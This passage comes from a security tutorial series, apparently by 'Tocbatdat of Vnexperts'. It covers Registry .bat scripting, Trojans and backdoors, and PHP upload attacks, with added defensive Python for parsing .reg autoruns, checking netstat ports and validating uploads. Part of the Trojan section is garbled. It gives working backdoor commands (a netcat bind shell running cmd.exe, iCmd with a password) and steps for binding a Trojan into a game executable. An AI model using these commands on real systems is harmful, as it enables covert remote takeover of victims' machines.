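Both the Agobot infection step in part IV (values added under Run and RunServices so the bot starts with the system) and the .reg files this section generates from .bat scripts come down to the same file format, so one parser serves both: it reads a .reg export, lists every addition and deletion, and flags values written to the two autostart keys. The following Python script is an added example, not code from the article: the sample .reg text is constructed (its chess value echoes the chess.exe lure in the Agobot section, and its TOCBATDAT value the deletion in example 4), and the function and field names are this example's own. Multi-line hex values are left unjoined, which is enough for the hand-written files this section deals with.

```python
import re

# Constructed .reg text in the format REG EXPORT writes and the .bat files above
# generate with ECHO; it is not the article's own example file.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"chess"="C:\\Windows\\chess.exe"

[HKEY_CURRENT_USER\Software\Example\Settings]
"Color"=dword:00000001
"TOCBATDAT"=-

[-HKEY_CURRENT_USER\Software\Example\Obsolete]
"""

# Autostart locations named in the Agobot section, compared without the hive.
AUTORUN_PATHS = {
    r"software\microsoft\windows\currentversion\run",
    r"software\microsoft\windows\currentversion\runservices",
}

# "name"=data, or @=data for the key's default value.
_VALUE_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|(?P<default>@))=(?P<data>.*)$')


def _decode(data):
    """Unescape a quoted REG_SZ value; dword:/hex: values are returned as written."""
    if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
        return data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    return data


def parse_reg(text):
    """Return (kind, key, name, data) entries in file order.

    kind is 'add-key', 'delete-key', 'set' or 'delete-value'.
    """
    entries, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            body = line[1:-1]
            if body.startswith("-"):            # [-HKEY...] deletes the whole key
                entries.append(("delete-key", body[1:], None, None))
                key = None
            else:
                key = body
                entries.append(("add-key", key, None, None))
            continue
        m = _VALUE_RE.match(line)
        if m and key is not None:
            name = "@" if m.group("default") else m.group("name")
            data = m.group("data")
            if data == "-":                     # "name"=- deletes one value
                entries.append(("delete-value", key, name, None))
            else:
                entries.append(("set", key, name, _decode(data)))
    return entries


def _path_without_hive(key):
    return key.split("\\", 1)[1].lower() if "\\" in key else ""


def autorun_additions(entries):
    """Values written under Run/RunServices: the persistence step Agobot uses."""
    return [(key, name, data) for kind, key, name, data in entries
            if kind == "set" and _path_without_hive(key) in AUTORUN_PATHS]


def deletions(entries):
    """Keys and values the file removes; name is None for a whole-key deletion."""
    return [(key, name) for kind, key, name, _ in entries
            if kind in ("delete-key", "delete-value")]


if __name__ == "__main__":
    parsed = parse_reg(SAMPLE_REG)
    print("autorun additions:", autorun_additions(parsed))
    print("deletions:", deletions(parsed))
```

Run over a .reg file before it is imported (or over a REG EXPORT of the two Run keys taken after a suspicious program was executed), the autorun list is the quickest way to see what a .bat-generated import would make start with Windows.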
4. Applications of Registry configuration
The Registry is where all the settings of the Windows system are stored.
Example 5: uninstalling any program. First we need to understand what uninstalling a program really involves:
- Step 1: stop the process and stop the services
- Step 2: delete everything related to the program in the Registry
- Step 3: delete the program's information in Program Files
For step 1 we have the commands: Taskkill /F /IM Processname to kill a process; net stop servicename to stop a service; sc config servicename start= disabled to disable a service.
For step 2: in section 3 I showed how to delete a folder or key in the Registry, so we can perform step 2 of the uninstall. Completely uninstalling a program requires finding all of the program's keys and folders in the Registry, which means that removing a large program such as Microsoft Office this way is extremely hard. From my own experience, writing a .bat file to remove Symantec software took 3 days because it had 500 Registry keys to delete.
For step 3: to delete a file use del file /f /q; to delete all files in a folder use del c:\folder\* /f /q.
Putting all the steps into one .bat file does the whole job.
Example 6: preventing a file from running on the computer.
This example lets us create a .bat file that blocks a virus from running on our machine.
Essentially this uses Group Policy, in the Software Restriction Policies section, with a hash rule. But Group Policy is only a graphical interface for editing the Registry, so we can edit the Registry directly to do the same thing.
5. Conclusion
Using .bat files to configure the Registry is valuable for security research and for a deeper understanding of the system. Notably, when these .bat files are converted to .exe they are never considered viruses.
Phn VII. Backdoor v Trojan ton tp
Trong bi vit ny ti s trnh by vi cc bn v Trojan v Backdoor. Nhng khi
nim c bn v Trojan v Backdoor, phn loi v cch thc ly nhim Trojan v
Backdoor. Cng vi nhng kin thc khc nh s dng mt s Trojan c bn, cch
thc n Trojan vo trong mt file .Exe. Cui cng ti s a ra cc gii php
phng chng Trojan v Backdoor.
1. Gii thiu v Trojans
2. Cc dng v cch hot ng ca Trojan
3. Cch nhn bit my tnh b nhim Trojan
4. S khc nhau ca cc Trojans
5. S dng mt s Trojan tn cng
6. Ghp mt hay nhiu Trojans vo mt file .EXE bnh thng
7. Cch pht hin Trojans v Backdoor
8. Gii php phng chng Trojan Backdoor
9. Kt lun
1. Gii thiu v Trojans.
- Mt Trojan l mt chng trnh nh chy ch n v gy hi cho my tnh.
- Vi s tr gip ca Trojan, mt k tt cng c th d dng truy cp vo my tnh
ca nn nhn thc hin mt s vic nguy hi nh ly cp d liu, xa file, v
nhiu kh nng khc.
2. Types of Trojans and how they work
- An attacker can access computers infected with Trojans whenever they are online.
- An attacker can access and control the victim's entire computer, and can use it for
many different purposes.
- The basic types of Trojans:
+ Remote Access Trojans: give the attacker complete remote control of the system.
+ Data-Sending Trojans: send sensitive information to the attacker.
+ Destructive Trojans: destroy the system.
+ Denial-of-Service (DoS) Attack Trojans: Trojans used to carry out DoS attacks.
+ Proxy Trojans
+ HTTP, FTP Trojans: the Trojan turns the machine into an HTTP or FTP server that the
attacker then exploits.
+ Security Software Disabler Trojans: switch off the security features on the victim's
computer.
- What the authors of Trojans are after:
+ Credit card details
+ Details of personal accounts such as email addresses, passwords, usernames
+ Confidential data
+ Financial information: bank accounts
+ Using the victim's computer to carry out some task, such as attacking, scanning, or
flooding the victim's own network.
3. The ways a victim's computer gets infected with a Trojan.
- Through online chat applications such as IRC (Internet Relay Chat)
- Through files attached to email
- Through the physical layer, such as exchanging data on USB drives, CDs, or hard disks
- By running a file infected with a Trojan
- Through NetBIOS file sharing
- Through malicious programs
- From untrusted web sites or sites offering free software
- It can hide inside ordinary applications; as soon as the application is run, the Trojan
runs too.
4. Ways to recognise a computer infected with Trojans (the most basic signs, and not
always reliable).
- The CD-ROM tray opens and closes by itself.
- Strange things appear on the screen.
- The background of Windows windows is changed.
- Documents print by themselves.
- The computer changes fonts and other settings by itself.
- The desktop wallpaper changes by itself and cannot be changed back.
- The left and right mouse buttons are swapped.
- The mouse pointer does not appear on the screen.
- The Start button does not appear.
- Some chat windows pop up.
Ports used by common Trojans.
- Back Orifice: UDP, ports 31337 and 31338
- Deep Throat: UDP, ports 2140 and 3150
- NetBus: TCP, ports 12345 and 12346
- Whack-a-mole: TCP, ports 12361 and 12362
- Netbus 2 Pro: TCP, port 20034
- GirlFriend: TCP, port 21544
- Masters Paradise: TCP, ports 3129, 40421, 40422, 40423 and 40426.
To find out which ports on the computer are active we use the command:
netstat -an
5. Using some kinds of Trojan
The purpose of this article is to help you understand Trojans; using Trojans is one of the
basic parts of security research. Once you know how the various kinds of Trojan are used
and how they work, you can come up with your own network security solutions for your
business and for our important data.
In this part I introduce the following Trojans:
- Tini
- iCmd
- Netcat
- HTTP RAT
a. The Tini Trojan
Any computer infected with this Trojan allows Telnet on port 7777 without any
authentication at all.
- To infect a system with this Trojan it only needs to be run once (or just press Enter on
the file) and everything is done; it then waits for Telnet connections on port 7777.
- Having run tini.exe on the machine 192.168.1.33, I can now, from any machine, use the
command telnet 192.168.1.33 7777 to get a console on that machine.
b. The iCmd Trojan
Similar to the Tini Trojan, but with one difference: it lets you choose the telnet port and
a password for accessing the machine infected with this Trojan.
Example: on the infected machine, iCmd.exe is run with the command
- iCmd.exe vne 8080
meaning that this machine enables telnet on port 8080 with the password vne.
In this example I placed the file iCmd.exe in the folder vnexperts.net on the C:\ drive.
- From another machine I can telnet to this machine with the command:
- telnet [IP] [port]
- As in the example above I type: telnet 192.168.1.33 8080
The system asks me for a password; I type vne and press Enter.
And the result:
c. The Netcat Trojan.
This Trojan lets us choose quite a few options, such as the port, running hidden, allowing
telnet, and so on.
To run this Trojan I type the command:
nc.exe -L -p [port] -t -e [program]
-L runs in listen mode
-p is the port to listen on.
-t allows Telnet.
-e runs the given program.
In this example I run it with the command
- nc.exe -L -p 8800 -t -e cmd.exe
Now, from any machine, I can telnet to this machine on port 8800 and have complete
control of the computer through the command line.
d. HTTP RAT
It works as a pre-programmed web server that lets you manage the computer through a web
interface. You can do this over the Internet: once a machine is infected with this Trojan
it automatically sends you an email, according to its configuration.
Now from any machine you can get into this machine through the window of any web browser:
http://192.168.1.33
I can run, delete, or download any file on the victim's machine.
e. ICMP Trojan
It tunnels over ICMP, which almost every firewall or system lets through.
- On the victim's machine, which uses the ICMP Trojan server, we must install this Trojan
with the following command
- From any machine you then use ICMPsend to remotely reach the system infected with the
ICMP Trojan.
In practice there are many other kinds of Trojan that you can learn about on sites
specialising in security; in this article I only demonstrate a few Trojans for training.
6. Hiding one or more Trojans inside a .exe or other normally-running file
The parts above cover basic Trojan usage. Say you want to use the Trojan iCmd.exe: what do
you have to do? Copy the file to the machine and run it with the command iCmd.exe vne 8800?
That is not possible, because nobody is going to let you sit at that machine.
So how does this Trojan get onto the victim's machine?
Unfortunately, clever attackers hide one or more Trojans inside an ordinary .exe file, such
as a game, an .exe from a Windows installer, or the executable of some free software, and
sometimes even inside the installer of an antivirus program.
The technique for hiding a Trojan in a .exe file is called a wrapper. Commonly used
programs:
- One file EXE Maker
- Yet Another Binder
- Pretator Wrapper.
a. Using One file EXE Maker to hide and run the file iCmd.exe
Download this program's installer, install it on the machine, then run it to bind the files.
The EXE file I chose is a very popular Caro game program, Fiver6_8.exe.
- The Caro game file I set to run normally
- The file iCmd.exe I set to run hidden and to be copied onto the system
- The extra command line I chose for iCmd.exe is vne 8800, allowing telnet on port 8800
with the password vne.
Press Save to finish the process.
- I saved it under the name caro.exe
Looking at the file sizes I see:
- iCmd.exe is 36KB
- Fiver6_8_en.exe is 310K
- Caro.exe, created from the two files above, is 353KB
Now I try running the file Caro.exe.
Only the Caro game window appears, but a file iCmd.exe is now active; check in Task
Manager:
From any machine I can now remote into this machine on port 8800 with the password vne.
In this article I only demonstrate one program for hiding files in an .exe; you can search
for these programs on the Internet.
7. How to detect Trojans.
Any Trojan program obeys three principles:
- To do its work, a Trojan must listen for requests on some port
- A running program must have a NAME in the process list
- A Trojan program will always run at the same time the computer starts up.
a. Detecting the ports used by Trojans
- Use the command netstat -an in Windows to see which ports the system is listening on
+ In the picture below we see port 7777, which turns out to be the Tini Trojan's port
+ My machine has no service on port 8800, so why is it in the listening state, and why is
another machine connected to it? That must be a Trojan.
- Use the program Fport
- Use the program TCPView
Luckily I can see every port in use and which program is using which port.
From here I can check my network services, and suspicious ports I can close with the
firewall.
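As an added example (not code from the article), the following Python script applies the port table from section 4 to `netstat -an` output in the way section 7a describes: every listener is compared against the known Trojan ports and against a baseline of the ports the host is expected to have open. The sample output and the baseline are constructed for this demo.

```python
"""Flag suspicious listeners in Windows `netstat -an` output (added example)."""
import re

# The article's port table (section 4) plus Tini's port 7777 (section 5a).
_TROJANS = [("Back Orifice", "UDP", [31337, 31338]), ("Deep Throat", "UDP", [2140, 3150]),
            ("NetBus", "TCP", [12345, 12346]), ("Whack-a-mole", "TCP", [12361, 12362]),
            ("Netbus 2 Pro", "TCP", [20034]), ("GirlFriend", "TCP", [21544]),
            ("Masters Paradise", "TCP", [3129, 40421, 40422, 40423, 40426]),
            ("Tini", "TCP", [7777])]
KNOWN_TROJAN_PORTS = {(proto, p): name for name, proto, ports in _TROJANS for p in ports}
# Constructed baseline: listeners this hypothetical host is expected to have.
EXPECTED_LISTENERS = {("TCP", 135), ("TCP", 139), ("TCP", 445), ("UDP", 137), ("UDP", 138)}
# One row: "  TCP    0.0.0.0:7777    0.0.0.0:0    LISTENING"; UDP rows carry no state.
ROW = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)\s*(\w+)?\s*$")

def parse_netstat(text):
    """Return (proto, local_port, state) for each connection row in the output."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            proto, _addr, port, _peer, state = m.groups()
            rows.append((proto, int(port), state or ""))
    return rows

def find_suspicious(text):
    """Flag listeners on known Trojan ports and listeners missing from the baseline."""
    findings = []
    for proto, port, state in parse_netstat(text):
        if proto == "TCP" and state != "LISTENING":
            continue  # ESTABLISHED / TIME_WAIT rows are connections, not listeners
        key = (proto, port)
        if key in KNOWN_TROJAN_PORTS:
            findings.append((proto, port, "known Trojan port: " + KNOWN_TROJAN_PORTS[key]))
        elif key not in EXPECTED_LISTENERS:
            findings.append((proto, port, "listener not in baseline"))
    return findings

# Constructed netstat -an output modelled on the article's example (ports 7777 and 8800).
SAMPLE = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:7777           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8800           0.0.0.0:0              LISTENING
  TCP    192.168.1.33:8800      192.168.1.10:1044      ESTABLISHED
  UDP    0.0.0.0:137            *:*
  UDP    0.0.0.0:31337          *:*
"""
```

Run `find_suspicious(SAMPLE)` to get the three flagged listeners; a real baseline should be built from a known-clean host rather than typed in by hand.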
b. Detecting running programs
- Use the program Process Viewer: every process is shown, even those running hidden and
not shown in the Windows Task Manager.
c. Finding a program that runs at startup
- In the Startup folder
- In the Registry: most of them are here. We use the command msconfig, Startup tab; any
program that wants to run automatically has to be listed there.
In this example I see the file nc.exe running at startup, located in the folder
c:\vnexperts.net
8. Defending against Trojans and Backdoors
- Do not use untrusted software (sometimes even trusted software comes with Trojans)
- Do not visit dangerous web sites, and do not install the ActiveX controls or JavaScript
offered on web pages, as Trojans may be attached
- Most important of all, update the OS regularly
- Install reputable antivirus software. I usually use Kaspersky Internet Security, Norton
Internet Security, and McAfee Total Security, but I hear there are many other good
antivirus and anti-Trojan products. After installing one, update it regularly.
9. Conclusion.
In this article I have presented the basic concepts of what Trojans and Backdoors are and
how they get into a system. A few demo Trojans showed you how dangerous a Trojan is. Most
importantly, protect your own environment against attacks from outside.
By Tocbatdat of the Vnexperts Research Department
Part VIII. Web hacking with PHP file upload, and how to defend against it
Commercial web sites and home-grown PHP forums that allow image uploads are very easy for a
hacker to attack by uploading a shell and taking control. In this article I will walk you
through the technique of uploading a PHP file to take control of the server, and how web
administrators can defend against this flaw.
When this vulnerability is checked with reputable scanners such as Acunetix or IBM AppScan
it is rated only Low, meaning low severity, yet it can be used to take control of the web
server. The main purpose of the article is for web administrators to understand the hidden
risks, the ways it is exploited, and how to defend.
The article is divided into these sections:
1. Required tools
2. The technique of uploading a PHP file and taking control of the web server
3. Hardening the web server to fix this security flaw
I. Required tools
- Burpsuite_v1.3
- Java framework
- Firefox
- a vulnerable website
- r57vn.php
1. Burpsuite_v1.3
This tool is written in Java, so Java must be installed before it can run. It works like a
web proxy, but it is an intercepting proxy.
Intercepting proxy: a proxy that lets you adjust the content of the packets the user sends
to the web server. So when we use this tool it lets us change the content of the request
the browser sends to the web server.
Download link: http://www.portswigger.net/suite/burpsuite_v1.3.zip
2. Java
This is the Java installer that lets Java programs run on the computer
Download link: http://sun.com
3. Firefox
Firefox is used because some techniques cannot be done with IE
4. A vulnerable website
I do not recommend that anyone go hacking other people's sites. White-hat hackers only hack
sites with the permission of the site's owner. In this article I hack directly into my own
site, http://tocbatdat.com, a site built on PHP that has the vulnerability.
5. r57vn.php
A shell that makes it simple to perform many tasks on the web server
II. The technique of uploading a PHP file and taking control of the web server
1. Preparation
Step 1: install Java
Step 2: download burpsuite_v1.3 and unzip it; once you see the .jar file, stop there
Step 3: install Firefox
Step 4: have the IE browser ready (IE is used to upload the file) because configuring a
proxy in IE is simpler
Step 5: connect to the Internet and visit the site http://tocbatdat.com (if I have already
fixed the vulnerability on this site, you can find another site with this flaw for the demo).
2. Uploading the PHP file to the website
a. General knowledge
Most websites today only allow uploading certain file types, such as jpg and gif, and do
not allow uploading other formats, so how do we upload a PHP file to such a site?
First we have to understand how the website detects that a file is not one of the allowed
formats. There are two ways a website checks:
+ Checking the file format (very common)
+ Checking the file extension (less common)
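The two kinds of check just described are strongest when an upload handler applies both. The following Python validator is an added example (not code from the article, and written in Python rather than the site's PHP to show the logic itself): it requires the content's image signature and the extension to agree, uses an extension allowlist, and rejects double extensions and client-supplied paths. The sample uploads are constructed.

```python
"""Validate an image upload by content and by extension (added example)."""
import os
import re

# Signatures (magic bytes) of the image types the upload form is meant to accept.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "png": b"\x89PNG\r\n\x1a\n",
}
# Allowed characters for the stored file name (no dots, slashes or spaces).
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def detect_format(data):
    """Return the image type whose signature the content starts with, or None."""
    for ext, sig in MAGIC.items():
        if data.startswith(sig):
            return ext
    return None

def validate_upload(filename, data):
    """Return (ok, detail): detail is the safe name to store, or the reason for rejection."""
    base = os.path.basename(filename)      # ignore any client-supplied directory part
    stem, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or "." in stem:
        return False, "exactly one extension required"      # rejects name.jpg.php
    if ext not in MAGIC:                                      # allowlist, not blocklist
        return False, f"extension .{ext} not allowed"
    if not SAFE_STEM.match(stem):
        return False, "file name contains characters outside the allowed set"
    found = detect_format(data)
    if found is None:
        return False, "content does not start with a known image signature"
    if MAGIC[found] != MAGIC[ext]:                            # jpg and jpeg share a signature
        return False, f"content is {found} but extension says {ext}"
    return True, f"{stem}.{ext}"

if __name__ == "__main__":
    # Constructed sample uploads: one valid image and several that must be rejected.
    png = b"\x89PNG\r\n\x1a\n" + b"\0" * 16
    for name, content in [("avatar.png", png), ("avatar.php", png),
                          ("avatar.jpg", b"not an image"), ("avatar.jpg.php", png),
                          ("../../x.gif", b"GIF89a" + b"\0" * 8)]:
        print(name, validate_upload(name, content))
```

Store accepted files under the returned name in a directory the web server does not execute scripts from; the check is only one layer.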